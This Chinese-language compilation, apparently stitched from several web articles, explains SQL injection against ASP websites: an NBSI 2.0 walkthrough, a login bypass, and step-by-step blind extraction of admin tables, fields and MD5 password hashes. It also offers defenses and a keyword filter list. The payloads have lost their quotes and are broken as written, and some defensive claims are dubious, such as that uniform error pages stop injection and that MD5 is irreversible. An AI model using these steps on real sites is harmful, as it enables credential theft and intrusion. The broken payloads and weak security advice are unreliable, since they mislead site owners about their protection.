當然這個過程是很煩瑣的而且要花費很多的時間，如果只能以這種手動方式進行SQL注入入侵的話，那麼許多存在SQL注入漏洞的ASP網站會安全很多了，不是漏洞不存在了，而是利用這個漏洞入侵的成本太高了。但是如果利用專門的黑客工具來入侵的話，那情況就大大不同了。手動方式進行SQL注入入侵至少需要半天或一天乃至很多天的時間，而利用專門的工具來入侵就只需要幾分鍾時間了（視網速快慢決定），再利用獲得的管理帳號和密碼，上傳一個從網上下載的ASP後門程序，就輕易獲得整個網站的管理許可權了，甚至整個伺服器的管理許可權。最有名的一種SQL注入入侵工具是NBSI 2.0，現在已經出到2.0版本了，不過，人家正式名稱不叫SQL注入入侵工具，而叫做網站安全漏洞檢測工具。有了這個所謂的檢測工具，使得入侵存在SQL注入漏洞的ASP網站成了小兒科的游戲，那些既不懂ASP又不懂SQL、年紀小小的男性青年常常得以在一天之內入侵十多個ASP網站，他們以此獲得內心的極大滿足。他們似乎也非常講究職業道德，往往並不破壞網站數據和系統，常見的破壞方式大都僅僅是改換掉網站的主頁，留下"善意的警告"，如：你的網站存在SQL注入漏洞，請管理員做好防範措施！並聲明"我沒有破壞數據和系統"，有的還要借機發布一下他的倡導："國內網站大家不要入侵，有本事入侵小日本的！"，最後，簽上他的鼎鼎大名是必不可少的程序。

如此大的成就多數情況下僅需動動滑鼠就做到了。打開最新版的NBSI 2.0，如圖1所示：輸入地址到A區，注意網址必須是帶傳遞參數的那種，點擊右邊的檢測按鈕，即出來B區信息，顯示當前用戶為sonybb的許可權為PUBLIC，當前庫為lawjia。有點可惜啊，如果是SA許可權的話，就可以跨庫注入了。不過，這個許可權也足夠獲取該網站管理員帳號和密碼了。點C區下的自動猜解按鈕，即出來當前庫lawjia中的各種表，哇，login表中一定是存管理員帳號和密碼的吧？選中它吧，接著點擊D區下的自動猜解按鈕，立即出來login表裡的列名稱，果然是存放用戶名和密碼的啊，太棒了！趕快打上勾，迫不急待的點擊E區下的自動猜解按鈕。激動人心的時刻就要到來啦，只見唰唰地幾下，帳號與密碼全部出來了。剩下的事就是辨別哪一個帳號是管理員了。

圖1（圖中的示例網站在作者本地電腦上運行）

不知那些沒注意過SQL注入漏洞的ASP程序員們看了上圖的例子，要作何感想呢？是不是覺得這個所謂的網站安全漏洞檢測工具SBSI 2.0簡直就是MS_SQL的企業管理器呢？只不過人家不需要帳號和密碼就可以查看您資料庫里的所有信息了。如果您的網站就這樣被人不費吹灰之力入侵了，您是不是要吐幾升血了呢？也許您已經為系統安全費盡心思了，裝補丁、安防火牆、裝殺毒軟體、巧妙配置IIS及資料庫用戶許可權，但您就是沒有注意到SQL注入漏洞，於是"千里之堤，潰於蟻穴"。防火牆與殺毒軟體對SQL注入是沒辦法防範的，因為SQL注入入侵跟普通的WEB頁面訪問沒什麼區別，所以往往是防不甚防。而且一個伺服器上放置的網站往往是有很多個的，伺服器管理員不可能挨個網站挨個頁面的審查其是否存在SQL注入漏洞。那麼應該如何防範SQL注入入侵呢？作為伺服器管理員或網站程序員應該分別怎麼做呢？伺服器管理員要做的事主要是配置IIS和資料庫用戶許可權，而網站程序員主要是要在程序代碼編寫上防範SQL注入入侵。下面詳細敘述：

對了伺服器管理員，既然你不可能挨個檢查每個網站是否存在SQL注入漏洞，那麼就來個一個絕招。這個絕招能有效防止SQL注入入侵而且"省心又省力，效果真好！"SQL注入入侵是根據IIS給出的ASP錯誤提示信息來入侵的，如果你把IIS設置成不管出什麼樣的ASP錯誤，只給出一種錯誤提示信息，即http 500錯誤，那麼人家就沒辦法入侵了。具體設置請參看圖2。主要把500:100這個錯誤的默認提示頁面 C:\WINDOWS\Help\iisHelp\common\500-100.asp改成
C:\WINDOWS\Help\iisHelp\common\500.htm即可，這時，無論ASP運行中出什麼錯，伺服器都只提示HTTP 500錯誤。

圖2、IIS出錯信息設置

但是這樣設置一個不好的地方是程序員編寫的代碼出錯時，伺服器不給出詳細的錯誤提示信息，會給程序員帶來很大的不便。不過，伺服器畢竟不是測試代碼的地方，應堅持安全穩定第一，這樣設置也是無可厚非的，事實上許多伺服器的出錯信息都是如此設置。

伺服器管理員還應在IIS中為每個網站設置好執行許可權，可千萬別給人家靜態網站以"腳本和可執行"許可權。一般情況下給個"純腳本"許可權就夠了，對於那些通過網站後台管理中心上傳的文件存放的目錄，就更吝嗇一點吧，執行許可權設為"無"好了，這樣做是為了防止人家上傳ASP木馬，執行許可權設為"無"，人家上傳ASP木馬也運行不了。一般情況下，SQL注入漏洞僅是涉及一個網站安全的事，如果人家通過這個漏洞上傳了ASP木馬並運行起來，那整個伺服器都失陷了。所以有遠見的、有責任心的伺服器管理員應該十分吝嗇的配置IIS的執行許可權。

同樣的吝嗇態度應適用於資料庫用戶的許可權配置上，當然這里資料庫是指MS＿SQL啦，ACCESS都沒有用戶許可權配置這一步驟。如果PUBLIC許可權足夠使用的絕不給再高的許可權，可千萬別把SA級別的許可權隨隨便便地給人家啊。那個所謂的網站安全漏洞檢測工具NBSI 2.0可有跨庫進行SQL注入的功能啊，如果你把SA許可權給了存在SQL注入漏洞的庫，那其它庫就不保啦！城門失火，殃及池魚呀。而人家還可以通過調用xp_cmdshell命令得到系統的最高許可權。具體步驟還是請參看上面提到的那篇《SQL注入漏洞全接觸》這篇文章吧。

接下來要講講程序員的防範措施了。程序主要要做兩件事，最重要的一件事，當然是對客戶端提交的變數參數進行仔細地檢測啦。對客戶端提交的變數進行檢查以防止SQL注入，有各種方法，到http://community.csdn.net/上搜索一下，你能獲得許多有益信息。這里介紹一種現成的方法，別人已經寫好了檢測代碼，拿來用一下，不用自己辛苦啦。那就是"楓葉SQL通用防注入V1.0 ASP版"，這是一段對用戶通過網址提交過來的變數參數進行檢查的代碼，發現客戶端提交的參數中有"exec、insert、select、delete、from、update、count、user、xp_cmdshell、add、net、Asc"等用於SQL注入的常用字元時，立即停止執行ASP並給出警告信息或轉向出錯頁面。大家可以到網上搜索一下，下載這段代碼，存為一個ASP頁面，如checkSQL.asp，把這個頁面include到每個需要帶參數查詢SQL資料庫ASP頁面中，記住，只要加一行這樣的<!--#include file="checkSQL.asp"-->代碼就行了。

程序員要做的第二件事是給用戶密碼加密啦。比如用MD5加密。MD5是沒有反向演算法,不能解密的。人家即使知道經加密後存在資料庫里的像亂碼一樣的密碼，他也沒辦法知道原始密碼了。不過，人家可以用UPDATE方法用他的密碼代替你的密碼，但這個操作還是有點麻煩，人家可能會怕麻煩而放棄。而那個所謂的網站安全漏洞檢測工具NBSI 2.0是沒有提供UPDATE操作功能的，所以用MD5加密後，人家僅用NBSI 2.0而不輔以手動操作的話，就不可能獲得網站管理員帳號的密碼，這將擋住許多菜鳥級的攻擊者，至少那些既不懂ASP又不懂SQL、年紀小小的男性青年是沒有辦法啦！

文章寫到這，已經夠長了，本來還想對那些所謂的網站安全漏洞檢測工具如NBSI之流的黑客工具進行一番理性的探討的，看來還是放棄好了。為了增強網站安全，了解攻擊手段是必須的，但是，利用漏洞開發專門的黑客工具，使那些其實並不具備必要的網路技術和網路安全知識的人（就是文中提到的"既不懂ASP又不懂SQL、年紀小小的男性青年"）輕而易舉地侵入一家網站，這除了為許多網路管理員製造麻煩外，是否還具有加強網路安全意識提高網路安全水平的功效呢？

Ⅳ 如何通過注入SQL語句獲取網站管理許可權及安全措施

一 網站是否存在SQL注入漏洞

網站一般包含一張用戶表(用戶名和密碼)和一張管理員信息表(管理員名稱和密碼), 輸入用戶名和密碼之後, 一般做法是後台都會執行一條SQL語句,
查詢有沒有對應的用戶和密碼, 比如SELECT * FROM SomeTable WHERE UserName = $UserName AND pwd =
$pwd, 如果這條語句返回真, 那麼登錄操作就完成了.

試想一下如果在學號和密碼文本框中輸入or=or, 並提交的話, 上面提到的SQL語句就變成了SELECT * FROM SomeTable WHERE
UserName = or=or AND pwd = or=or, 這個語語句變成了一個邏輯表達式, 表達式包含幾段, 分別為:

1. SELECT * FROM SomeTable WHERE UserName = (假)

or

2. = (真)

or

3. (假)

and

4. pwd = (假)

or

5. = (真)

or

6. (假)

最後整個邏輯表達式為0|1|0&0|1|0, 這個結果為真(在執行到"0|1|..."的時候整個表達式省略號中的就不計算了,
因為"或"前面已經是真), 因此可以登錄成功, 事實上也登錄成功了.

二 破解後台資料庫的原理

在用戶名和密碼的文本框中輸入or=or, 截至上面所示的第2步, 表達式值為真, 因為後面緊接了一個"或", 所以無論在這後面的表達式是什麼,
"真或者假""真或者真"都是為真的. 關鍵就是or=or中間的那個=, =表示一個字元, 永遠為真. 如果我們將這個=改成某個SQL表達式,
如果這個表達式為真, 那麼整個表達式就為真.

後面的幾個步驟要求用戶名和密碼文本框中都輸入同樣的文本, 原因是: 後台的語句格式可能是SELECT * FROM SomeTable WHERE
UserName = $UserName AND pwd = $pwd, 也有可能是SELECT * FROM SomeTable WHERE pwd =
$pwd AND UserName = $UserName, 無論哪一種情況, 只要用戶名和密碼都輸入的文本是一樣的, 只要文本中包含的SQL表達式為真,
那麼整個表達式就為真. 這樣寫帶來的另一個好處是復制粘貼很方便.

通過寫一些SQL表達式來一次一次的測試出資料庫里的內容.

三 獲取後台資料庫的表名

如果將表達式替換為(SELECT COUNT(*) FROM 表名)<>0, 這個表達式用來獲取一個表中有多少條記錄,
需要做的就是猜這個表名是什麼, 猜中了的話, 那麼這個表中的記錄條數肯定就不會等於0, 那麼這個表達式的值就是真的. 常用的表名也就是那麼一些,
一個個的代進去試, 最後發現有個叫做admin的表, 它的欄位不為空. 很顯然, 這個表是用來存放管理員信息的.

四 獲取後台資料庫表的欄位名

現在已經知道這個表叫做admin了, 接下來想辦法得到這個表中的欄位.

把表達式替換成(SELECT COUNT(*) FROM admin WHERE LEN(欄位名)>0)<>0,
這個表達式用來測試admin這個表中是否包含這個欄位. LEN(欄位名)>0表示這個欄位的長度大於0, 在這個欄位存在的情況下,
LEN(欄位名)>0是始終為真的. 如果包含的話這個欄位的話, 整條SELECT語句返回的數字肯定不為0, 也就是說整個表達式為真,
從而得到欄位名.

按照這樣的方法, 靠猜共得出了三個很關鍵的欄位:id, admin, pass.

五 獲取欄位的長度

目前已得到的信息是有個admin表, 表中有id, admin, pass欄位. 後台中存儲用戶名和密碼,
常規做法是存儲它們進行MD5加密後的值(32位), 現在測試一下是不是這樣.

把表達式替換為(SELECT COUNT(*) FROM admin WHERE LEN(欄位名)=32)<>0,
將admin和pass代進去結果是真, 說明後台存儲管理員帳號和密碼用的是加密後32位的欄位.

六 獲取管理員帳號和密碼

MD5加密後的字元串包含32位, 且只可能是由0-9和A-F這些字元組成.

1. 獲取管理員帳號

將表達式改成(SELECT COUNT(*) FROM admin WHERE LEFT(admin,1)=A)>0,
意思是我猜測某個adimin帳號的第一個字元是A, 如果成功則表達式成立. 失敗的話, 把A換成0-9和B-F中的任意字元繼續試, 知道成功. 如果成功了,
我再繼續猜這個帳號的第二個字元, 假如第一個字元是5, 我猜測第二個字元是A, 那將表達式改成(SELECT COUNT(*) FROM admin WHERE
LEFT(admin,2)=5A)>0. 可以發現字元串中LEFT()函數中的1變成了2, 另外5A代碼左邊兩個字元是5A, 其中5已經確定下來了.
就這樣重復不斷的猜, 直到得到整個32位的MD5加密後的字元串.

2. 獲取該帳號對應的的id

為什麼需要獲取該帳號對應的id? 原因如下: 按照上一條是可以得到帳號和密碼的, 但一張表中可以有若干個管理員帳號和密碼, 怎麼對應起來呢?
需要通過id. 一個id對應一條記錄, 一條記錄只有一對匹配的帳號和密碼.

將表達式改成(SELECT COUNT(*) FROM admin WHERE LEFT(admin,1)=5 AND id=1)>0,
上一條假設了某帳號第一個字元是5, 只要這個表達式中的"AND id = 1"正確, 那麼就可以得知該帳號的id是1. 如果不是1,
換成其它的數字一個個的試一試.

3. 獲取帳號對應的密碼

現在已經猜出了某管理員的帳號, 並且知道對應的id是多少(假設得出來是4), 現在只要得到該條記錄中記錄的密碼是什麼. 同理,
將表達式改成(SELECT COUNT(*) FROM admin WHERE LEFT(pass,1)=A AND id=4)>0,
注意id已經是知道了的4, 現在要一個個的猜pass中從第1個到第32個字元是什麼, 方法同"獲取管理員帳號"方法.
最後可以得到一個32位的MD5加密後的字元串(密碼).

*注: 如果嫌手工得到每個字元是什麼太麻煩, 可以自己用C#寫一個程序, 模擬一下登錄, 通過控制一個循環, 可以很快得到結果.

七 將MD5加密後的帳號和密碼轉成明文

網上有一些網站資料庫里存儲了海量(幾萬億條)的MD5加密後的暗文對應的明文, 只需輸入你需要查找的MD5加密後的字元串就可以查看到明文是什麼.

Ⅳ 製作網站時,SQL注入是什麼怎麼注入法

SQL注入是:

許多網站程序在編寫時，沒有對用戶輸入數據的合法性進行判斷，使應用程序存在安全隱患。用戶可以提交一段資料庫查詢代碼(一般是在瀏覽器地址欄進行,通過正常的www埠訪問)，根據程序返回的結果，獲得某些想得知的數據，這就是所謂的SQL Injection，即SQL注入。

網站的惡夢——SQL注入

SQL注入通過網頁對網站資料庫進行修改。它能夠直接在資料庫中添加具有管理員許可權的用戶，從而最終獲得系統管理員許可權。黑客可以利用獲得的管理員許可權任意獲得網站上的文件或者在網頁上加掛木馬和各種惡意程序，對網站和訪問該網站的網友都帶來巨大危害。

防禦SQL注入有妙法

第一步：很多新手從網上下載SQL通用防注入系統的程序，在需要防範注入的頁面頭部用 來防止別人進行手動注入測試。可是如果通過SQL注入分析器就可輕松跳過防注入系統並自動分析其注入點。然後只需要幾分鍾，你的管理員賬號及密碼就會被分析出來。

第二步：對於注入分析器的防範，筆者通過實驗，發現了一種簡單有效的防範方法。首先我們要知道SQL注入分析器是如何工作的。在操作過程中，發現軟體並不是沖著「admin」管理員賬號去的，而是沖著許可權(如flag=1)去的。這樣一來，無論你的管理員賬號怎麼變都無法逃過檢測。

第三步：既然無法逃過檢測，那我們就做兩個賬號，一個是普通的管理員賬號，一個是防止注入的賬號，為什麼這么說呢?筆者想，如果找一個許可權最大的賬號製造假象，吸引軟體的檢測，而這個賬號里的內容是大於千字以上的中文字元，就會迫使軟體對這個賬號進行分析的時候進入全負荷狀態甚至資源耗盡而死機。下面我們就來修改資料庫吧。

1.對表結構進行修改。將管理員的賬號欄位的數據類型進行修改，文本型改成最大欄位255(其實也夠了，如果還想做得再大點，可以選擇備注型)，密碼的欄位也進行相同設置。

2.對表進行修改。設置管理員許可權的賬號放在ID1，並輸入大量中文字元(最好大於100個字)。

3.把真正的管理員密碼放在ID2後的任何一個位置(如放在ID549上)。

我們通過上面的三步完成了對資料庫的修改。

這時是不是修改結束了呢?其實不然，要明白你做的ID1賬號其實也是真正有許可權的賬號，現在計算機處理速度那麼快，要是遇上個一定要將它算出來的軟體，這也是不安全的。我想這時大多數人已經想到了辦法，對，只要在管理員登錄的頁面文件中寫入字元限制就行了!就算對方使用這個有上千字元的賬號密碼也會被擋住的，而真正的密碼則可以不受限制。